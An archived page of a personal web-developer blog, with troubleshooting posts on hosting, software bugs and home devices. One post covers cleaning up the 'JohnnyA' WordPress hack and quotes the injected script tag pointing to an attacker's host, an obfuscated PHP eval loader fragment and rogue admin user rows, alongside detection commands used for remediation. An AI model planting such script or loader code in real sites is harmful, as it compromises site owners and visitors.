A windsurfing, CSS-grudging, IE-hating, web-developing, gigantic-machine-puzzling blog

Author: Wick Page 4 of 6

Lost Connection To MySQL Server on MediaTemple Grid Server

I’ve been a MediaTemple Grid Server (gs) customer since it was released. From the beginning, Mediatemple has had MySQL problems with “Lost connection to MySQL server during query at [script name] [line number]” errors.

I have several system update Perl scripts for CarComplaints.com that I run as cron jobs or from the command line that take a few minutes to run. They access a MySQL database via the standard DBI Perl module. Maybe 1/3 of the time, the mysql connection is lost 2-3 minutes into the update.

I’ve ignored MediaTemple’s lost mysql connection problem for years. Lately though, the dropped connection errors have become more of a headache so I decided to do some troubleshooting.

I upgraded from the MediaTemple MySQL SmartPool to a MySQL Container & played around with the various mysql config timeout settings, but there was no change in when & how often the lost mysql connections occurred. Everything pointed to a connectivity issue with MediaTemple’s service.

Next move was to contact MediaTemple support about the issue. MediaTemple has a pretty good reputation for customer service. Wow. Turns out lost MySQL connections are their Achilles’ heel.

First they blamed slow mysql queries. I pointed out the scripts encountering the error are not public-facing, so 300,000 queries or 1 query that evaluates 300,000 rows in one shot makes no difference. All my slightly “slow queries” are for good reason — the tables have the proper indexes, etc.

Next they blamed cron job processing limitations. I reiterated that the lost mysql connections errors happen just as often when the script is run manually from the command prompt, & that the errors occur very inconsistently indicating a time/cpu limit is probably not involved.

Finally they combined both theories (!!) to suggest the lost mysql connections were “a problem with MySQL optimization” & also that I may be “overloading the GridContainer” by running scripts concurrently with cron jobs … definitely not happening.

And the kicker from MediaTemple support tech “Joel M.”:

Please note that (mt) Media Temple only supports the basic operation and uptime of your (gs) Application Container Technology.

… conveniently implying that lost mysql connections on the GridServer were not an issue of basic operation & uptime. I’d love to hear the logic behind that one.

At that point I decided my time would be better spent coding a way around MediaTemple’s Grid Server / MySQL / tech support shortcomings.

I wrote a MySQL reconnection handler so that it reconnects a few times before giving up. So far so good.

Here are more people experiencing this same problem with lost mysql connections on Mediatemple.

MySQL.com has some advice about “Lost connection to MySQL server” errors:

Usually it indicates network connectivity trouble and you should check the condition of your network if this error occurs frequently. If the error message includes “during query,” this is probably the case you are experiencing.

HP Support Forum Disallows Problems

HP is turning into a problem.

Apparently HP disallows tagging any forum post to their Support Forum as a “problem”.

Right, because then they would rule their own search results for “HP problem” with useful discussion threads.

Smart move.

Major select bug in Corel PaintShop Photo Pro X3 Ultimate

What use is PSP X3 when it randomly deletes pixels?

APRIL, 2011: This bug has been fixedthe patch is part of PSP Service Pack 5.

I bought PaintShop Photo Pro X3 Ultimate a short while ago. I’m getting concerned by the number of words Corel keeps adding to my favorite graphics editor product title, but they haven’t failed me in the 15 years I’ve been a faithful PaintShop Pro user.

Last week I sat down & started rather happily editing a raster layer. I may have even been whistling “Paris / Ooh La La” by Grace Potter & the Nocturnals. I made a selection using the rectangle select tool, no feathering or anti-aliasing or anything special. Dragged it over a bit, then deselected. The bottom ~3 rows of pixels promptly disappeared.

I couldn’t believe it. I quickly scanned the select tool options for the “randomly cut off bottom pixels” feature Corel had no doubt added to PSP X3 Ultimate. No suck luck.

Unfortunately this makes Paint Shop Pro X3 Ultimate …. well, for lack of a better term, TOTALLY FUCKING USELESS!!

I headed over to the Corel forums where I was disheartened to find several other posts about this bug. Someone even took the time in that 2nd link to make a video. The 3rd link has 4 pages of deselect bug complaints, dating back to April 2010 (!!)

Apparently Corel hasn’t fixed this deselect bug with the 4 service packs released so far for Paint Shop Pro X3.

I contacted their support team through email. The advice came back to “reset my workspace”. That makes sense right? Because there’s that awesomely useful workspace option that cuts off pixels on deselection? You guessed it, resetting workspace didn’t change a thing, except now I’m even more annoyed that I have to set up my workspace again! But then again, hey, why bother until after they fix the whole pixel deleting thing?

I fired off a reply with the forum links to Corel Support this morning. Can’t wait to see how they respond. Honestly, I expect more from a Canadian company.

Clearly I should have bought the less-ultimate version.

UPDATE FROM JANUARY 21st, 2011: After not receiving any further response, I called Corel this morning. Their phone system said to expect hold time of under 20 minutes. I was on hold for 46 minutes. They loop one song. When I was finally got through, the support tech immediately acknowledged the issue & although they couldn’t give me even a ballpark idea when a patch might be ready, they did say it was a very high priority for their dev team. Also said they’d contact me when the fix is released. Very nice of them.

Two hours later, an email popped up from a Corel Senior Project Manager — he sent me a beta patch to try. It solved the bug perfectly. Now we’re getting somewhere. It still amazes me how PSP Photo X3 was able to ship with such a basic flaw, but I guess it happens.

UPDATE FROM FEBRUARY 1st, 2011: Just received this from the Corel rep.

I’m working with the support team right now to release an Interim Patch with just this hot fix in it. It should be available by the end of the week and I’ll let everyone know about the KB article at that time. Again, we will roll it into the full Patch later but this will get it out for more people.

I’ll make sure to post the link to the public interim patch when it becomes available. Nice to see Corel is being proactive about this. Better late than never!

UPDATE FROM APRIL 1st, 2011: FIXED!! No April Fools joke. Corel has posted the fix under PSP X3 Knowledge Base article 000005465 – “In some cases, pixels along the bottom edge of a selection are dropped”. For the record, this patch is not part of PSP’s auto-update process – it has to be installed manually. Corel has released Service Pack 5 which is part of the auto-update process, & includes this patch. Spread the word…

HP Pavillion Laptop Fan Cycles On & Off & On & Off & On…

HP Pavillion dv6t fan cycles on & off endlessly

How I fixed my HP Pavillion dv6t CPU fan

I recently bought a HP Pavillion dv6t laptop, only to return it after a few days — I’d press the power button to turn it on & it would cycle off & on 10-15 times before eventually deciding to stay on for good. HP tech support took 6 solid hours on the phone to cheerfully wade through their pre-exchange process in a futile attempt to fix an obvious hardware power problem (doing things like a full-system virus scan) … but they finally accepted it back.

After another few weeks, I received my shiny new HP Pavillion dv6t, take two! I happily turned it on (and it stayed on), & almost immediately I noticed the cooling fan cycling:

Whiirrrrrrrr…. silence. Whirrrrrrrr…. silence. Whirrr….. silence.

The cooling fan would cycle on & off every ~30 seconds. It would turn on with a loud whir, then slowly decrease speed down to near-silent, then shut off for 10 seconds, & start the whole thing over. Pretty freaking annoying. Granted it was marginally better than the power cycling issue with my first Pavillion dv6t, but this was the CPU fan equivalent of Chinese water torture.

I checked the System Resource monitor, no CPU or disk usage spikes. Tried rebooting, no difference. Tried it plugged in & on battery … Changed power settings around … Cursed HP & threatened to exchange it yet again. Nothing. The only improvement was when the processor was under load — the fan stayed on a little longer between its spastic cycling.

I found a “Fan Always On” setting enabled in the BIOS (which clearly wasn’t working) & tried switching it to “Disabled”. It made the pause between the fan cycling only slightly longer. Someone at HP has an evil sense of humor.

At this point I got my CPU fan mace off the shelf & started practicing. As a last resort, I tried a BIOS update, although HP’s BIOS update changelog didn’t mention any cooling management improvements. But, it COMPLETELY FIXED the fan cycling problem.

Unfortunately I didn’t write down what BIOS version with apparently defective fan management I started out with, but regardless, the most recent BIOS update from the HP website fixed the issue.

Hope this helps someone else out there. I still have nightmares. Whirr… silence. Whirrr…

UPDATE: I’m sorry to report that the BIOS update only partially fixed the fan problem. It’s not occurring as frequently now as before the BIOS update, but still pretty annoying. Now the fan cycling happens occasionally for 5-10 minutes whenever I use the laptop on battery power. It’s not because the fan vent is blocked — I have the 9-cell battery that creates about an inch of space under the back edge.

Apache httpd.conf changes ignored in Windows 7

VirtualStore in Windows 7 causes problems

Feature? Hack? Or hugely misguided mistake?

Imagine this: You are a web developer. You buy a brand new computer running Windows 7. You install Apache using all the default installation options. You fire up your browser to see Apache’s “It works!” test page …so it does, Apache. Awesome.

You edit httpd.conf to point to your latest web project, restart Apache, refresh the browser. Which still shows It works! … not your project. Hmm. No startup errors in the Apache error.log …. you close & reopen httpd.conf & your changes still look good. Apache still shows It works! In a mad rage you delete all settings in httpd.conf & bang out some undocumented 4-letter profanity settings guaranteed to throw Apache startup errors. Restart Apache. It works! No, Apache, it doesn’t!! What the fuck.

WTF is happening is a little-known feature, hack, & extremely bad idea from Microsoft in Windows 7 (and some other versions) called VirtualStore. VirtualStore should have been called VirtualStoreYourFilesElsewhereAndNotTellYou, because that’s what is occurring.

When you saved your edited httpd.conf file, Windows 7 secretly saved it in (deep breath) …

/Users/[Your User Name]/AppData/Local/VirtualStore/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf

… and a hidden link gets created within your Program Files folders to the VirtualStore copy. Normally this works okay with legacy Windows programs, but apparently with Apache running as a service, it doesn’t pick up the VirtualStore link.

The upshot is while you continue madly editing your VirtualStore’d httpd.conf, Apache continues reading the original, which you are secretly being prevented from editing. How are you supposed to know what’s going on? Take a look …

Awful VirtualStore Warning

Microsoft's alert that VirtualStore files exist

Yea. One little icon in the action bar. Not at all noticeable.

(Microsoft should consider using my patented red oval).

No indication of which files are “Compatibility Files”.

And apparently, the linked file system doesn’t work consistently. What a stupid feature. It’s a hack, really, trying to blindly protect an operating system infamous for core-level security flaws.

How about a simple warning that the VirtualStore hack was occurring? Or ditch VirtualStore & display a UAC-style dialog, “Program X wants to write to Program Files, cancel or allow?” Even cancel or allow would be an improvement.

run as Administrator

Don't forget this minor detail.

What triggered VirtualStore in the first place? Way back when you fired up your text editor, you needed to run it in Administrator mode. Only then does it have the ability to save files directly under the protected Program Files folder structure without VirtualStore links.

How to fix the VirtualStore mess — First, move your Apache config file(s) out of the VirtualStore folder structure. Then delete the Virtualstore/Apache Software Foundation/ folder. That removes the “Compatibility Files” links from the real directory. Then you can run your text editor in Administrator mode & redo your Apache config edits.

Or even better: right-click on the folder that contains the files you want to edit, click Properties, Security tab & give Full Access privileges to your Windows user.

Notepad (& possibly Wordpad) won’t trigger VirtualStore — instead they’ll simply throw a “permission denied” error until you switch to Administrator mode. Most third-party editors like Komodo Edit will silently generate the VirtualStore’d copies until you run them in Administrator mode.

You can see which of your applications are being VirtualStore’d by opening Task manager, Processes tab, View menu, “Select Columns…”, check Virtualization. Back at the task list, any process with “Enabled” in the column means you’re in for some VirtualStore fuckedupedness.

Best part: VirtualStore isn’t just for files — any program attempting to write to the registry under the HKEY_LOCAL_MACHINE\Software branch will be VirtualStore-slapped over to HKEY_CURRENT_USER\Software\Classes\VirtualStore\MACHINE\Software

Hope this helps someone! As someone commented on another blog, “I really hate how Microsoft surprises you with their new retarded ways of keeping us safe from ourselves.” Amen to that.

If you have Windows 7 Professional, Ultimate, or Enterprise editions, you can disable VirtualStore completely through the Local Policy Editor. This may prevent some legacy programs from running, however.

For more, see VirtualStore is horrible. How do you disable it in Windows 7.

JohnnyA Hack on MediaTemple grid server

Noticed malware warning messages thanks to Google Safe Browsing, when viewing several of my websites hosted on MediaTemple’s Grid Server (gs) account.

Did some searching & found it’s a widespread attack on MediaTemple. MediaTemple lets (gs) customers host up to 100 domains under one account for the low-low price of $20/month … pretty great, until you have to figure out the path of entry for a hacker.

Although thankfully so far it’s not actually destructive, the “JohnnyA” hack is a mess (like any good hack!):

  • Javascript files had malicious obfuscated code inserted at the top of the compromised files. For my site the hackers targeted the jQuery library, jQuery plugins (corner, impromptu, etc), & swfobject.js that came bundled in the cu3er WordPress theme.
  • PHP files of 5298 bytes were spread all throughout the site structure, named for Unix functions: chmod.php, closedir.php, content.php, eregi.php, fclose.php, fopen.php, fwrite.php, is_file.php, is_writable.php …. all were located under html/ (not cgi-bin/) so they were especially easy to locate & delete.
  • WordPress default theme index.php & footer.php (someone else mentioned their header.php was also compromised) had malicious Javascript code added.
  • WordPress posts had malicious code added to the top:
    <h5><script src="http://maroon.karenegren.com/js/jquery.min.js"></script></h5>
  • WordPress databases had “johnnyA” & “WordPress” admin users added to the wp_users table, as well as entries under wp_metauser with what looks like some sort of evil admin interface HTML/Javascript code. Here is my hacked WP users table:
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    | ID | user_login | user_pass                          | user_nicename | user_email                | user_url | user_registered     | user_activation_key | user_status | display_name |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    | 14 | johnnyA    | $P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/ | John          | sarkonerr@gmail.com       |          | 0000-00-00 00:00:00 |                     |           0 | John         |
    | 12 | WordPress  | 3e04a6d10c88e6f5818a2a4151f9a95c   | WordPress     | www@www.com               | www.com  | 0000-00-00 00:00:00 |                     |           0 | WordPress    |
    |  1 | admin      | [censored]                         | admin         | [censored]                | http://  | 2006-10-23 13:24:13 |                     |           0 | netscraps    |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+

Cleanup took awhile — see below. I also changed my MediaTemple AccountCenter password, my user (SSH/SFTP) account passwords, database passwords, moved all my WordPress installations off to a new, completely separate (not linked in AccountCenter) MediaTemple grid server account, & signed up for Sucuri’s website malware monitoring service …. because of all the recent hack problems, MediaTemple customers receive a discount. Great. Here’s hoping it catches any hacks before Google Safe Browsing does.

The posts below have a lot of information on various ways to scan for the compromised files but so far I haven’t seen anything definitive in terms of how to prevent this all from happening again. Definitely read the posted comments too:

Here are the steps I took to remove the exploits:

Find compromised Javascript files:

  • find . -name "*.js" -exec grep -l "gr0=0" {} \;
  • find . -name "*.js" -exec grep -l "this.n=3279;this.O=58441;" {} \;

… Both searches returned the same results for me. The evil Javascript was the top line of each file, very long mostly obfuscated code ending with var gr0=0; The evil top line didn’t have its own newline character at the end, so be careful not to remove the ENTIRE top line without checking first that you’re not removing legitimate code way at the end of the line.

Find evil PHP files:

  • grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *
    This search may show false positives. Look for matches that look like:
    <?php $o = '[random characters here];eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?>
  • Another way to check is:
    find . -name "*.php" -ctime 14
    …which shows a list of .php files where the timestamp is within the last 14 days.
  • If the file is 5298 bytes, chances are the entire file is junk & you can delete it.
  • Otherwise if the file is something that was pre-existing (like WordPress theme header.php, index.php etc) you’ll have to edit it & remove the bad code by hand or better yet, replace the entire compromised file with a clean version from a backup or original distribution.

Find evil WordPress users:

  • You’ll need mySQL access to your WordPress database for this. You are on your own there.
  • use dbxxxxxx_wp; (whatever your WordPress database is named)
  • select * from wp_users; (note the id for all users you don’t recognize)
  • delete from wp_users where id = 'xx'; (replace xx with the id, & remember each one you delete)
  • delete from wp_usermeta where user_id = 'xx' (do this once for each userid you deleted above)

Find evil WordPress posts:

  • select post_content from wp_posts where post_content like '%<h5><script%';
  • update wp_posts set post_content = replace( post_content, "<h5>script here</h5>", ""); …run this once for each unique script found above, replacing “script here” with the actual script tag.

Scanning legal-size documents with the Canon MX860 ADF is needlessly complicated

Canon MX860: how to scan legal-size documents

Pound the Canon MX860 repeatedly with a gavel.

You’d think in this day & age of all-in-one printers, you could put a legal-size document in the document feeder (ADF) & scan away. Not so with the Canon MX860.

Out of the box, the MX860’s ADF will scan legal-size documents as a letter-size PDF with the bottom 3 inches cut off. Document length auto-detection with the ADF was apparently too complex for Canon engineers (?!)

Technically the MX860 can scan legal-size paper, but it’s a trick (“trick” meaning pain in the ass) if you typically use the handy buttons on the scanner for everything. Here’s how:

Load up the MX860’s desktop scanning software, which Canon cryptically called “MP Navigator EX” — mine opens up to a wizard-style screen. Select “Stack Of Documents (ADF)”, the click the “Specify…” button on the left-hand side & there you can temporarily change the PDF document size for the next ADF scan.

If you scan legal documents all the time & want to change the settings permanently: Click the “Preferences” button (top/right corner) & switch to the “Scanner Button Settings” tab. Then you can change the document settings for each one-click action. So for instance you could set the “Save to PC” action to scan a legal-size PDF & “Save to PDF” to scan in letter size.

Sounds needlessly complicated? It is, absolutely. Hopefully Canon will add automatic document length detection for the ADF in a future firmware/software update, but I wouldn’t count on it.

(Anyone know if this is fixed with the Canon MX870?)

Raising The Cheonan

Salvaging the South Korean corvette “Cheonan” is old news now that the US has a major ecological disaster to contend with (the Deepwater Horizon oil spill), but these AP photos of the bow section of the Cheonan being raised are pretty amazing. It’s hard to believe a world that has the technology to grab a sunken battleship off the seafloor after a few short days can’t plug an itty bitty mile-deep runaway oil well any faster.

Continuous beeping from my Trojan UV Max C4

Continuous Beeping from a Trojan UV Max C4

Continuous beeping from my Trojan UV Max C4Our Trojan UVMax C4 water purifier started beeping continuously. The install date was April 2009, so it’s been a year — according to the manual, time to replace the UV bulb!

I dutifully ordered a new UV lamp ($90) & installed it. Wiping my hands in smug homeowner anticipation of what was sure to be the return of super clean water for my family, I plugged the C4 power supply back in… green lights all around… but the beeping didn’t stop.

I unplugged the unit, waited a bit, plugged it back in… more beeping. Pulled out the manual. The only mention of the beeping alarm is in the troubleshooting section, which refers you back to the Control Panel section, which has all kinds of useful information about the status lights but absolutely nothing about a beeping alarm.

The manual says there’s supposed to be a model-specific reference card stuck behind the power supply. Sure enough I could see the tab sticking up — I felt a wave of relief, as surely the reference card would have an answer to The Meaning Of The Incessant Beep.

Nope. No mention of an audible alarm whatsoever.

By now I could feel a beeping-induced headache. Putting my hope in the Internet for a solution, I ran upstairs to the computer. Sure enough, the top result had the answer (thanks, Google) — but it wasn’t from the Trojan UVMax website — a random reseller had taken the time to post the answer … Apparently TrojanUV produced defective C4 power supply units between January 2009 – January 2010. Yep, a whole year of defective units. But although they’re now four months into people discovering the problem, there’s nothing about it on their website. No notice, no press release, nothing (or am I just not seeing it?)

The solution is to contact Trojan for a replacement power supply. In the meantime, I’m stuck with choosing between unsafe drinking water or constant beeping.

So in review:

  1. There is nothing the Trojan UV Max manual about what the beeping alarm means,
  2. There is no way to silence the beeping alarm,
  3. The Trojan UV website lacks any information about this year-long manufacturing defect.

Just to make life a little harder, the email link on the Trojan UV Max support website (Viqua) goes nowhere.

I called their customer service line & the rep I spoke with knew about the C4 problem right away. Apparently they had mistakenly installed firmware for the “Plus” version — which have a reset button to silence the alarm — into the “regular” C4 units, which don’t.

I asked the rep if the replacement C4 power supply was shipping via overnight express. He mumbled something to the effect that I should have it “within a day or two”. However it’s been 3 days & I still don’t have the replacement Trojan UV Max C4 power supply, so it’s becoming clear that Trojan doesn’t care enough to ship these via overnight or 2-day mail.

By now I’ve lost count how many ways Trojan UV customer service has completely failed their customers.

UPDATE (1/21/11): Still no note about this defect on their website. Even a simple note on their Support page, like “C4 Beeping? Click here to contact tech support” would be far more helpful to their customers than nothing at all. However in the 8 months since I originally posted this, Viqua has fixed their website contact links so they actually work, so that’s one step in the right direction! Seems that people have had better success by calling Viqua though.

Thunderbird ignores Windows’ default printer setting

I bought a new printer, a Canon MX860. As all-in-one printers go, it’s fantastic. Soon it was knighted as my new Windows’ default printer.

Everything was happy in Printerland until I tried to print an email from Thunderbird. Thunderbird kept selecting my old printer — I had left the old printer driver installed — and each time I had to change the printer back to my new Canon. Granted, that’s a pretty minor annoyance, but let enough minor annoyances pass you by & soon they get together & storm the castle.

Turns out Thunderbird stores its own default printer setting & if it’s set, the Windows default printer gets completely ignored. Worse, Thunderbird’s default printer setting is about as hidden as it gets:

  1. Tools menu -> Options -> Advanced -> General tab -> Config Editor button
  2. filter the list by typing “printer” in the Filter box (top of the screen)
  3. find the print.print_printer setting (who names these settings, anyway?)
  4. right-click & click “Reset”.

That does the trick!

UPDATE 12/11/12: Recently some people have reported back that:

  • print.print_printer doesn’t show up in the settings anymore & it’s print_printer now
  • they had to reset both print.print_printer and print_printer

Hope that helps!

Page 4 of 6

Powered by WordPress & Theme by Anders Norén